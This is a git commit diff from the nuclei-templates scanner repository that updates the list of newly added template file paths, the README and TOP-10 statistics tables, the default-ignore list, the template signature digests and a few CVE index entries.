Merge remote-tracking branch 'origin' into fix-wp-FP
commit
01d9665d6a
|
@ -27,7 +27,7 @@ jobs:
|
|||
- name: Run TemplateMan
|
||||
id: tmc
|
||||
run: |
|
||||
echo /home/runner/work/nuclei-templates/nuclei-templates | tmc -mr -e
|
||||
echo /home/runner/work/nuclei-templates/nuclei-templates | tmc -mr -e -at
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
|
|
|
@ -3,91 +3,83 @@ on:
|
|||
push:
|
||||
paths:
|
||||
- '.new-additions'
|
||||
- 'dns/soa-detect.yaml'
|
||||
- 'dns/spf-record-detect.yaml'
|
||||
- 'dns/txt-service-detect.yaml'
|
||||
- 'file/keys/dependency/dependency-track.yaml'
|
||||
- 'file/keys/docker/dockerhub-pat.yaml'
|
||||
- 'file/keys/doppler/doppler-audit.yaml'
|
||||
- 'file/keys/doppler/doppler-cli.yaml'
|
||||
- 'file/keys/doppler/doppler-scim.yaml'
|
||||
- 'file/keys/doppler/doppler-service-account.yaml'
|
||||
- 'file/keys/doppler/doppler-service.yaml'
|
||||
- 'file/keys/dropbox/dropbox-access.yaml'
|
||||
- 'file/keys/huggingface/huggingface-user-access.yaml'
|
||||
- 'file/keys/linkedin/linkedin-client.yaml'
|
||||
- 'file/keys/linkedin/linkedin-secret.yaml'
|
||||
- 'file/keys/newrelic/newrelic-api-service.yaml'
|
||||
- 'file/keys/newrelic/newrelic-license-non.yaml'
|
||||
- 'file/keys/newrelic/newrelic-license.yaml'
|
||||
- 'file/keys/odbc/odbc-connection.yaml'
|
||||
- 'file/keys/okta/okta-api.yaml'
|
||||
- 'file/keys/particle/particle-access.yaml'
|
||||
- 'file/keys/react/reactapp-password.yaml'
|
||||
- 'file/keys/react/reactapp-username.yaml'
|
||||
- 'file/keys/salesforce/salesforce-access.yaml'
|
||||
- 'file/keys/thingsboard/thingsboard-access.yaml'
|
||||
- 'file/keys/truenas/truenas-api.yaml'
|
||||
- 'file/keys/twitter/twitter-client.yaml'
|
||||
- 'file/keys/twitter/twitter-secret.yaml'
|
||||
- 'file/keys/wireguard/wireguard-preshared.yaml'
|
||||
- 'file/keys/wireguard/wireguard-private.yaml'
|
||||
- 'http/cves/2023/CVE-2023-49785.yaml'
|
||||
- 'http/cves/2023/CVE-2023-5830.yaml'
|
||||
- 'http/cves/2023/CVE-2023-5914.yaml'
|
||||
- 'http/cves/2023/CVE-2023-6114.yaml'
|
||||
- 'http/cves/2023/CVE-2023-6567.yaml'
|
||||
- 'http/cves/2024/CVE-2024-1212.yaml'
|
||||
- 'http/cves/2024/CVE-2024-1698.yaml'
|
||||
- 'http/cves/2024/CVE-2024-27954.yaml'
|
||||
- 'http/default-logins/ispconfig-default-login.yaml'
|
||||
- 'http/exposed-panels/bynder-panel.yaml'
|
||||
- 'http/exposed-panels/c2/ares-rat-c2.yaml'
|
||||
- 'http/exposed-panels/c2/caldera-c2.yaml'
|
||||
- 'http/exposed-panels/c2/hack5-cloud-c2.yaml'
|
||||
- 'http/exposed-panels/c2/pupyc2.yaml'
|
||||
- 'http/exposed-panels/c2/supershell-c2.yaml'
|
||||
- 'http/exposed-panels/cisco/cisco-expressway-panel.yaml'
|
||||
- 'http/exposed-panels/emqx-panel.yaml'
|
||||
- 'http/exposed-panels/fortinet/forticlientems-panel.yaml'
|
||||
- 'http/exposed-panels/fortinet/fortiwlm-panel.yaml'
|
||||
- 'http/exposed-panels/neocase-hrportal-panel.yaml'
|
||||
- 'http/exposed-panels/osnexus-panel.yaml'
|
||||
- 'http/exposed-panels/posteio-admin-panel.yaml'
|
||||
- 'http/exposed-panels/skeepers-panel.yaml'
|
||||
- 'http/exposed-panels/softether-vpn-panel.yaml'
|
||||
- 'http/exposures/files/generic-db.yaml'
|
||||
- 'http/misconfiguration/installer/posteio-installer.yaml'
|
||||
- 'http/osint/phishing/kakao-login-phish.yaml'
|
||||
- 'http/osint/phishing/naver-login-phish.yaml'
|
||||
- 'http/technologies/directus-detect.yaml'
|
||||
- 'http/technologies/microsoft/aspnet-version-detect.yaml'
|
||||
- 'http/technologies/microsoft/aspnetmvc-version-disclosure.yaml'
|
||||
- 'http/technologies/wing-ftp-service-detect.yaml'
|
||||
- 'http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml'
|
||||
- 'http/vulnerabilities/idoc/idocview-2word-fileupload.yaml'
|
||||
- 'http/vulnerabilities/idoc/idocview-lfi.yaml'
|
||||
- 'http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml'
|
||||
- 'http/vulnerabilities/other/office365-indexs-fileread.yaml'
|
||||
- 'http/vulnerabilities/other/ups-network-lfi.yaml'
|
||||
- 'javascript/audit/mysql/mysql-load-file.yaml'
|
||||
- 'javascript/enumeration/mysql/mysql-default-login.yaml'
|
||||
- 'javascript/enumeration/mysql/mysql-info.yaml'
|
||||
- 'javascript/enumeration/mysql/mysql-show-databases.yaml'
|
||||
- 'javascript/enumeration/mysql/mysql-show-variables.yaml'
|
||||
- 'javascript/enumeration/mysql/mysql-user-enum.yaml'
|
||||
- 'javascript/enumeration/pop3/pop3-capabilities-enum.yaml'
|
||||
- 'javascript/enumeration/redis/redis-info.yaml'
|
||||
- 'javascript/enumeration/redis/redis-require-auth.yaml'
|
||||
- 'javascript/enumeration/rsync/rsync-version.yaml'
|
||||
- 'javascript/enumeration/smb/smb-default-creds.yaml'
|
||||
- 'javascript/enumeration/smb/smb-enum-domains.yaml'
|
||||
- 'javascript/enumeration/smb/smb-os-detect.yaml'
|
||||
- 'javascript/enumeration/smb/smb-version-detect.yaml'
|
||||
- 'javascript/enumeration/smb/smb2-server-time.yaml'
|
||||
- 'javascript/misconfiguration/mysql/mysql-empty-password.yaml'
|
||||
- 'network/detection/wing-ftp-detect.yaml'
|
||||
- 'ssl/c2/venomrat.yaml'
|
||||
- 'dast/cves/2018/CVE-2018-19518.yaml'
|
||||
- 'dast/cves/2021/CVE-2021-45046.yaml'
|
||||
- 'dast/cves/2022/CVE-2022-34265.yaml'
|
||||
- 'dast/cves/2022/CVE-2022-42889.yaml'
|
||||
- 'dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml'
|
||||
- 'dast/vulnerabilities/cmdi/ruby-open-rce.yaml'
|
||||
- 'dast/vulnerabilities/crlf/cookie-injection.yaml'
|
||||
- 'dast/vulnerabilities/crlf/crlf-injection.yaml'
|
||||
- 'dast/vulnerabilities/csti/angular-client-side-template-injection.yaml'
|
||||
- 'dast/vulnerabilities/lfi/lfi-keyed.yaml'
|
||||
- 'dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml'
|
||||
- 'dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml'
|
||||
- 'dast/vulnerabilities/redirect/open-redirect.yaml'
|
||||
- 'dast/vulnerabilities/rfi/generic-rfi.yaml'
|
||||
- 'dast/vulnerabilities/sqli/sqli-error-based.yaml'
|
||||
- 'dast/vulnerabilities/ssrf/blind-ssrf.yaml'
|
||||
- 'dast/vulnerabilities/ssrf/response-ssrf.yaml'
|
||||
- 'dast/vulnerabilities/ssti/reflection-ssti.yaml'
|
||||
- 'dast/vulnerabilities/xss/dom-xss.yaml'
|
||||
- 'dast/vulnerabilities/xss/reflected-xss.yaml'
|
||||
- 'dast/vulnerabilities/xxe/generic-xxe.yaml'
|
||||
- 'http/cves/2016/CVE-2016-5674.yaml'
|
||||
- 'http/cves/2018/CVE-2018-10735.yaml'
|
||||
- 'http/cves/2018/CVE-2018-10736.yaml'
|
||||
- 'http/cves/2018/CVE-2018-10737.yaml'
|
||||
- 'http/cves/2018/CVE-2018-10738.yaml'
|
||||
- 'http/cves/2018/CVE-2018-6605.yaml'
|
||||
- 'http/cves/2018/CVE-2018-7314.yaml'
|
||||
- 'http/cves/2019/CVE-2019-9632.yaml'
|
||||
- 'http/cves/2021/CVE-2021-46418.yaml'
|
||||
- 'http/cves/2021/CVE-2021-46419.yaml'
|
||||
- 'http/cves/2022/CVE-2022-29013.yaml'
|
||||
- 'http/cves/2022/CVE-2022-32430.yaml'
|
||||
- 'http/cves/2022/CVE-2022-41412.yaml'
|
||||
- 'http/cves/2023/CVE-2023-0159.yaml'
|
||||
- 'http/cves/2023/CVE-2023-0678.yaml'
|
||||
- 'http/cves/2023/CVE-2023-34993.yaml'
|
||||
- 'http/cves/2023/CVE-2023-47218.yaml'
|
||||
- 'http/cves/2024/CVE-2024-20767.yaml'
|
||||
- 'http/cves/2024/CVE-2024-27564.yaml'
|
||||
- 'http/cves/2024/CVE-2024-28255.yaml'
|
||||
- 'http/cves/2024/CVE-2024-28734.yaml'
|
||||
- 'http/cves/2024/CVE-2024-29059.yaml'
|
||||
- 'http/cves/2024/CVE-2024-29269.yaml'
|
||||
- 'http/default-logins/3com/3Com-wireless-default-login.yaml'
|
||||
- 'http/default-logins/3ware-default-login.yaml'
|
||||
- 'http/default-logins/next-terminal/next-terminal-default-login.yaml'
|
||||
- 'http/exposed-panels/amprion-gridloss-panel.yaml'
|
||||
- 'http/exposed-panels/safenet-authentication-panel.yaml'
|
||||
- 'http/exposed-panels/syfadis-xperience-panel.yaml'
|
||||
- 'http/exposures/configs/deployment-ini.yaml'
|
||||
- 'http/miscellaneous/form-detection.yaml'
|
||||
- 'http/misconfiguration/https-to-http-redirect.yaml'
|
||||
- 'http/technologies/celebrus-detect.yaml'
|
||||
- 'http/technologies/privatebin-detect.yaml'
|
||||
- 'http/technologies/simplesamlphp-detect.yaml'
|
||||
- 'http/technologies/yourls-detect.yaml'
|
||||
- 'http/vulnerabilities/dahua/dahua-eims-rce.yaml'
|
||||
- 'http/vulnerabilities/huatian/huatian-oa-sqli.yaml'
|
||||
- 'http/vulnerabilities/landray/landray-eis-sqli.yaml'
|
||||
- 'http/vulnerabilities/other/voyager-lfi.yaml'
|
||||
- 'javascript/cves/2012/CVE-2012-2122.yaml'
|
||||
- 'javascript/cves/2019/CVE-2019-9193.yaml'
|
||||
- 'javascript/enumeration/minecraft-enum.yaml'
|
||||
- 'javascript/enumeration/pgsql/pgsql-default-db.yaml'
|
||||
- 'javascript/enumeration/pgsql/pgsql-file-read.yaml'
|
||||
- 'javascript/enumeration/pgsql/pgsql-list-database.yaml'
|
||||
- 'javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml'
|
||||
- 'javascript/enumeration/pgsql/pgsql-list-users.yaml'
|
||||
- 'javascript/enumeration/pgsql/pgsql-version-detect.yaml'
|
||||
- 'javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml'
|
||||
- 'javascript/misconfiguration/pgsql/postgresql-empty-password.yaml'
|
||||
- 'javascript/udp/detection/tftp-detect.yaml'
|
||||
- 'network/c2/darkcomet-trojan.yaml'
|
||||
- 'network/c2/darktrack-rat-trojan.yaml'
|
||||
- 'network/c2/orcus-rat-trojan.yaml'
|
||||
- 'network/c2/xtremerat-trojan.yaml'
|
||||
workflow_dispatch:
|
||||
jobs:
|
||||
triggerRemoteWorkflow:
|
||||
|
|
162
.new-additions
162
.new-additions
|
@ -1,85 +1,77 @@
|
|||
dns/soa-detect.yaml
|
||||
dns/spf-record-detect.yaml
|
||||
dns/txt-service-detect.yaml
|
||||
file/keys/dependency/dependency-track.yaml
|
||||
file/keys/docker/dockerhub-pat.yaml
|
||||
file/keys/doppler/doppler-audit.yaml
|
||||
file/keys/doppler/doppler-cli.yaml
|
||||
file/keys/doppler/doppler-scim.yaml
|
||||
file/keys/doppler/doppler-service-account.yaml
|
||||
file/keys/doppler/doppler-service.yaml
|
||||
file/keys/dropbox/dropbox-access.yaml
|
||||
file/keys/huggingface/huggingface-user-access.yaml
|
||||
file/keys/linkedin/linkedin-client.yaml
|
||||
file/keys/linkedin/linkedin-secret.yaml
|
||||
file/keys/newrelic/newrelic-api-service.yaml
|
||||
file/keys/newrelic/newrelic-license-non.yaml
|
||||
file/keys/newrelic/newrelic-license.yaml
|
||||
file/keys/odbc/odbc-connection.yaml
|
||||
file/keys/okta/okta-api.yaml
|
||||
file/keys/particle/particle-access.yaml
|
||||
file/keys/react/reactapp-password.yaml
|
||||
file/keys/react/reactapp-username.yaml
|
||||
file/keys/salesforce/salesforce-access.yaml
|
||||
file/keys/thingsboard/thingsboard-access.yaml
|
||||
file/keys/truenas/truenas-api.yaml
|
||||
file/keys/twitter/twitter-client.yaml
|
||||
file/keys/twitter/twitter-secret.yaml
|
||||
file/keys/wireguard/wireguard-preshared.yaml
|
||||
file/keys/wireguard/wireguard-private.yaml
|
||||
http/cves/2023/CVE-2023-49785.yaml
|
||||
http/cves/2023/CVE-2023-5830.yaml
|
||||
http/cves/2023/CVE-2023-5914.yaml
|
||||
http/cves/2023/CVE-2023-6114.yaml
|
||||
http/cves/2023/CVE-2023-6567.yaml
|
||||
http/cves/2024/CVE-2024-1212.yaml
|
||||
http/cves/2024/CVE-2024-1698.yaml
|
||||
http/cves/2024/CVE-2024-27954.yaml
|
||||
http/default-logins/ispconfig-default-login.yaml
|
||||
http/exposed-panels/bynder-panel.yaml
|
||||
http/exposed-panels/c2/ares-rat-c2.yaml
|
||||
http/exposed-panels/c2/caldera-c2.yaml
|
||||
http/exposed-panels/c2/hack5-cloud-c2.yaml
|
||||
http/exposed-panels/c2/pupyc2.yaml
|
||||
http/exposed-panels/c2/supershell-c2.yaml
|
||||
http/exposed-panels/cisco/cisco-expressway-panel.yaml
|
||||
http/exposed-panels/emqx-panel.yaml
|
||||
http/exposed-panels/fortinet/forticlientems-panel.yaml
|
||||
http/exposed-panels/fortinet/fortiwlm-panel.yaml
|
||||
http/exposed-panels/neocase-hrportal-panel.yaml
|
||||
http/exposed-panels/osnexus-panel.yaml
|
||||
http/exposed-panels/posteio-admin-panel.yaml
|
||||
http/exposed-panels/skeepers-panel.yaml
|
||||
http/exposed-panels/softether-vpn-panel.yaml
|
||||
http/exposures/files/generic-db.yaml
|
||||
http/misconfiguration/installer/posteio-installer.yaml
|
||||
http/osint/phishing/kakao-login-phish.yaml
|
||||
http/osint/phishing/naver-login-phish.yaml
|
||||
http/technologies/directus-detect.yaml
|
||||
http/technologies/microsoft/aspnet-version-detect.yaml
|
||||
http/technologies/microsoft/aspnetmvc-version-disclosure.yaml
|
||||
http/technologies/wing-ftp-service-detect.yaml
|
||||
http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml
|
||||
http/vulnerabilities/idoc/idocview-2word-fileupload.yaml
|
||||
http/vulnerabilities/idoc/idocview-lfi.yaml
|
||||
http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml
|
||||
http/vulnerabilities/other/office365-indexs-fileread.yaml
|
||||
http/vulnerabilities/other/ups-network-lfi.yaml
|
||||
javascript/audit/mysql/mysql-load-file.yaml
|
||||
javascript/enumeration/mysql/mysql-default-login.yaml
|
||||
javascript/enumeration/mysql/mysql-info.yaml
|
||||
javascript/enumeration/mysql/mysql-show-databases.yaml
|
||||
javascript/enumeration/mysql/mysql-show-variables.yaml
|
||||
javascript/enumeration/mysql/mysql-user-enum.yaml
|
||||
javascript/enumeration/pop3/pop3-capabilities-enum.yaml
|
||||
javascript/enumeration/redis/redis-info.yaml
|
||||
javascript/enumeration/redis/redis-require-auth.yaml
|
||||
javascript/enumeration/rsync/rsync-version.yaml
|
||||
javascript/enumeration/smb/smb-default-creds.yaml
|
||||
javascript/enumeration/smb/smb-enum-domains.yaml
|
||||
javascript/enumeration/smb/smb-os-detect.yaml
|
||||
javascript/enumeration/smb/smb-version-detect.yaml
|
||||
javascript/enumeration/smb/smb2-server-time.yaml
|
||||
javascript/misconfiguration/mysql/mysql-empty-password.yaml
|
||||
network/detection/wing-ftp-detect.yaml
|
||||
ssl/c2/venomrat.yaml
|
||||
dast/cves/2018/CVE-2018-19518.yaml
|
||||
dast/cves/2021/CVE-2021-45046.yaml
|
||||
dast/cves/2022/CVE-2022-34265.yaml
|
||||
dast/cves/2022/CVE-2022-42889.yaml
|
||||
dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml
|
||||
dast/vulnerabilities/cmdi/ruby-open-rce.yaml
|
||||
dast/vulnerabilities/crlf/cookie-injection.yaml
|
||||
dast/vulnerabilities/crlf/crlf-injection.yaml
|
||||
dast/vulnerabilities/csti/angular-client-side-template-injection.yaml
|
||||
dast/vulnerabilities/lfi/lfi-keyed.yaml
|
||||
dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml
|
||||
dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml
|
||||
dast/vulnerabilities/redirect/open-redirect.yaml
|
||||
dast/vulnerabilities/rfi/generic-rfi.yaml
|
||||
dast/vulnerabilities/sqli/sqli-error-based.yaml
|
||||
dast/vulnerabilities/ssrf/blind-ssrf.yaml
|
||||
dast/vulnerabilities/ssrf/response-ssrf.yaml
|
||||
dast/vulnerabilities/ssti/reflection-ssti.yaml
|
||||
dast/vulnerabilities/xss/dom-xss.yaml
|
||||
dast/vulnerabilities/xss/reflected-xss.yaml
|
||||
dast/vulnerabilities/xxe/generic-xxe.yaml
|
||||
http/cves/2016/CVE-2016-5674.yaml
|
||||
http/cves/2018/CVE-2018-10735.yaml
|
||||
http/cves/2018/CVE-2018-10736.yaml
|
||||
http/cves/2018/CVE-2018-10737.yaml
|
||||
http/cves/2018/CVE-2018-10738.yaml
|
||||
http/cves/2018/CVE-2018-6605.yaml
|
||||
http/cves/2018/CVE-2018-7314.yaml
|
||||
http/cves/2019/CVE-2019-9632.yaml
|
||||
http/cves/2021/CVE-2021-46418.yaml
|
||||
http/cves/2021/CVE-2021-46419.yaml
|
||||
http/cves/2022/CVE-2022-29013.yaml
|
||||
http/cves/2022/CVE-2022-32430.yaml
|
||||
http/cves/2022/CVE-2022-41412.yaml
|
||||
http/cves/2023/CVE-2023-0159.yaml
|
||||
http/cves/2023/CVE-2023-0678.yaml
|
||||
http/cves/2023/CVE-2023-34993.yaml
|
||||
http/cves/2023/CVE-2023-47218.yaml
|
||||
http/cves/2024/CVE-2024-20767.yaml
|
||||
http/cves/2024/CVE-2024-27564.yaml
|
||||
http/cves/2024/CVE-2024-28255.yaml
|
||||
http/cves/2024/CVE-2024-28734.yaml
|
||||
http/cves/2024/CVE-2024-29059.yaml
|
||||
http/cves/2024/CVE-2024-29269.yaml
|
||||
http/default-logins/3com/3Com-wireless-default-login.yaml
|
||||
http/default-logins/3ware-default-login.yaml
|
||||
http/default-logins/next-terminal/next-terminal-default-login.yaml
|
||||
http/exposed-panels/amprion-gridloss-panel.yaml
|
||||
http/exposed-panels/safenet-authentication-panel.yaml
|
||||
http/exposed-panels/syfadis-xperience-panel.yaml
|
||||
http/exposures/configs/deployment-ini.yaml
|
||||
http/miscellaneous/form-detection.yaml
|
||||
http/misconfiguration/https-to-http-redirect.yaml
|
||||
http/technologies/celebrus-detect.yaml
|
||||
http/technologies/privatebin-detect.yaml
|
||||
http/technologies/simplesamlphp-detect.yaml
|
||||
http/technologies/yourls-detect.yaml
|
||||
http/vulnerabilities/dahua/dahua-eims-rce.yaml
|
||||
http/vulnerabilities/huatian/huatian-oa-sqli.yaml
|
||||
http/vulnerabilities/landray/landray-eis-sqli.yaml
|
||||
http/vulnerabilities/other/voyager-lfi.yaml
|
||||
javascript/cves/2012/CVE-2012-2122.yaml
|
||||
javascript/cves/2019/CVE-2019-9193.yaml
|
||||
javascript/enumeration/minecraft-enum.yaml
|
||||
javascript/enumeration/pgsql/pgsql-default-db.yaml
|
||||
javascript/enumeration/pgsql/pgsql-file-read.yaml
|
||||
javascript/enumeration/pgsql/pgsql-list-database.yaml
|
||||
javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml
|
||||
javascript/enumeration/pgsql/pgsql-list-users.yaml
|
||||
javascript/enumeration/pgsql/pgsql-version-detect.yaml
|
||||
javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml
|
||||
javascript/misconfiguration/pgsql/postgresql-empty-password.yaml
|
||||
javascript/udp/detection/tftp-detect.yaml
|
||||
network/c2/darkcomet-trojan.yaml
|
||||
network/c2/darktrack-rat-trojan.yaml
|
||||
network/c2/orcus-rat-trojan.yaml
|
||||
network/c2/xtremerat-trojan.yaml
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
# ====================================
|
||||
#
|
||||
# This is default list of tags and files to excluded from default nuclei scan.
|
||||
# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
|
||||
# More details - https://docs.projectdiscovery.io/tools/nuclei/running#template-exclusion
|
||||
#
|
||||
# ============ DO NOT EDIT ============
|
||||
# Automatically updated by nuclei on execution from nuclei-templates
|
||||
|
@ -13,9 +13,9 @@
|
|||
# unless asked for by the user.
|
||||
|
||||
tags:
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "local"
|
||||
- "fuzz"
|
||||
- "bruteforce"
|
||||
|
||||
# The following templates have been excluded because they have weak matchers and may generate FP results.
|
||||
|
@ -34,3 +34,7 @@ files:
|
|||
- http/fuzzing/wordpress-themes-detect.yaml
|
||||
- http/fuzzing/mdb-database-file.yaml
|
||||
- http/fuzzing/iis-shortname.yaml
|
||||
- dns/soa-detect.yaml
|
||||
- dns/txt-service-detect.yaml
|
||||
- javascript/enumeration/pop3/pop3-capabilities-enum.yaml
|
||||
- javascript/enumeration/redis/redis-require-auth.yaml
|
||||
|
|
20
README.md
20
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
||||
| cve | 2388 | dhiyaneshdk | 1189 | http | 7229 | info | 3544 | file | 312 |
|
||||
| panel | 1093 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 |
|
||||
| wordpress | 954 | dwisiswant0 | 802 | workflows | 191 | medium | 1464 | | |
|
||||
| exposure | 892 | pikpikcu | 353 | network | 132 | critical | 960 | | |
|
||||
| xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | |
|
||||
| wp-plugin | 829 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | |
|
||||
| osint | 791 | pdteam | 285 | javascript | 26 | | | | |
|
||||
| tech | 661 | ricardomaia | 231 | dns | 18 | | | | |
|
||||
| lfi | 634 | geeknik | 227 | headless | 11 | | | | |
|
||||
| cve | 2396 | dhiyaneshdk | 1233 | http | 7267 | info | 3605 | file | 337 |
|
||||
| panel | 1105 | daffainfo | 864 | file | 337 | high | 1601 | dns | 24 |
|
||||
| wordpress | 958 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | |
|
||||
| exposure | 894 | pikpikcu | 353 | network | 133 | critical | 967 | | |
|
||||
| xss | 893 | pussycat0x | 328 | code | 80 | low | 257 | | |
|
||||
| wp-plugin | 833 | ritikchaddha | 313 | javascript | 42 | unknown | 35 | | |
|
||||
| osint | 799 | pdteam | 285 | ssl | 28 | | | | |
|
||||
| tech | 667 | ricardomaia | 232 | dns | 21 | | | | |
|
||||
| lfi | 640 | geeknik | 227 | headless | 11 | | | | |
|
||||
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |
|
||||
|
||||
**571 directories, 8318 files**.
|
||||
**594 directories, 8406 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
10363
TEMPLATES-STATS.md
10363
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
18
TOP-10.md
18
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
||||
| cve | 2388 | dhiyaneshdk | 1189 | http | 7229 | info | 3544 | file | 312 |
|
||||
| panel | 1093 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 |
|
||||
| wordpress | 954 | dwisiswant0 | 802 | workflows | 191 | medium | 1464 | | |
|
||||
| exposure | 892 | pikpikcu | 353 | network | 132 | critical | 960 | | |
|
||||
| xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | |
|
||||
| wp-plugin | 829 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | |
|
||||
| osint | 791 | pdteam | 285 | javascript | 26 | | | | |
|
||||
| tech | 661 | ricardomaia | 231 | dns | 18 | | | | |
|
||||
| lfi | 634 | geeknik | 227 | headless | 11 | | | | |
|
||||
| cve | 2396 | dhiyaneshdk | 1233 | http | 7267 | info | 3605 | file | 337 |
|
||||
| panel | 1105 | daffainfo | 864 | file | 337 | high | 1601 | dns | 24 |
|
||||
| wordpress | 958 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | |
|
||||
| exposure | 894 | pikpikcu | 353 | network | 133 | critical | 967 | | |
|
||||
| xss | 893 | pussycat0x | 328 | code | 80 | low | 257 | | |
|
||||
| wp-plugin | 833 | ritikchaddha | 313 | javascript | 42 | unknown | 35 | | |
|
||||
| osint | 799 | pdteam | 285 | ssl | 28 | | | | |
|
||||
| tech | 667 | ricardomaia | 232 | dns | 21 | | | | |
|
||||
| lfi | 640 | geeknik | 227 | headless | 11 | | | | |
|
||||
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |
|
||||
|
|
|
@ -47,4 +47,4 @@ code:
|
|||
- '!contains(code_1_response, "root")'
|
||||
- 'contains(code_2_response, "root")'
|
||||
condition: and
|
||||
# digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502204e166f9afc32a9e3f2aa20cf10f4dc7c4ccc6d9ecfb25279db42ee4884fd9a09022100e24c0145e3cb670939ecba31b847513224c52277827290d7358cd3b5e8531825:922c64590222798bb761d5b6d8e72950
|
|
@ -40,4 +40,4 @@ code:
|
|||
- "malloc(): memory corruption"
|
||||
- "Aborted (core dumped)"
|
||||
condition: and
|
||||
# digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502204de6d29ee97c296f1046225fd664237cb80c163370f316bfa2c0174718fa0654022100cbd49f46b75314934af75dde946dbe4a3d135d87368f2dead3b9b2fa40bb839b:922c64590222798bb761d5b6d8e72950
|
|
@ -54,4 +54,4 @@ code:
|
|||
- '!contains(code_1_response, "(root)")'
|
||||
- 'contains(code_2_response, "(root)")'
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220115656a336b2d20b4c44fe1ade030de40d947cf0fd7fb8f8a5a910dca2ab200602205ead45f6f081b3555a7924050cd922e13d30139e64254790b1368627d59b4389:922c64590222798bb761d5b6d8e72950
|
|
@ -86,4 +86,4 @@ http:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- '"Username => "+ username'
|
||||
# digest: 4a0a00473045022100c83052cd67b0ace0260a06981566dedfe5355e346d73cc08201817df5a072c590220350dc5ce635ba42dd9a62eed7a671edfc4f9601a8ce02ff5f5e6bcfc6e63f4c3:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022036740507180fa43831d3d59a5ccaae05fa1108c27c42a19564fa3f0fc5da439f02205a94a9cbb26731a679d9d39a80c72ff0ff1c48346680963d6aa05f94de9b2e95:922c64590222798bb761d5b6d8e72950
|
|
@ -39,4 +39,4 @@ code:
|
|||
- type: word
|
||||
words:
|
||||
- "127" # Segmentation Fault Exit Code
|
||||
# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402204e884ed16aed759a6b31c001e50ee4aed4db45f060d3335e1b6f28935eae4135022051929119a0bf2eac944500d98af2720a6ff835dcb875f35cc6390fbdf47c8bda:922c64590222798bb761d5b6d8e72950
|
58
cves.json
58
cves.json
|
@ -165,7 +165,7 @@
|
|||
{"ID":"CVE-2011-4336","Info":{"Name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","Severity":"medium","Description":"Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET \"ajax\" parameter to snarf_ajax.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2011/CVE-2011-4336.yaml"}
|
||||
{"ID":"CVE-2011-4618","Info":{"Name":"Advanced Text Widget \u003c 2.0.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4618.yaml"}
|
||||
{"ID":"CVE-2011-4624","Info":{"Name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4624.yaml"}
|
||||
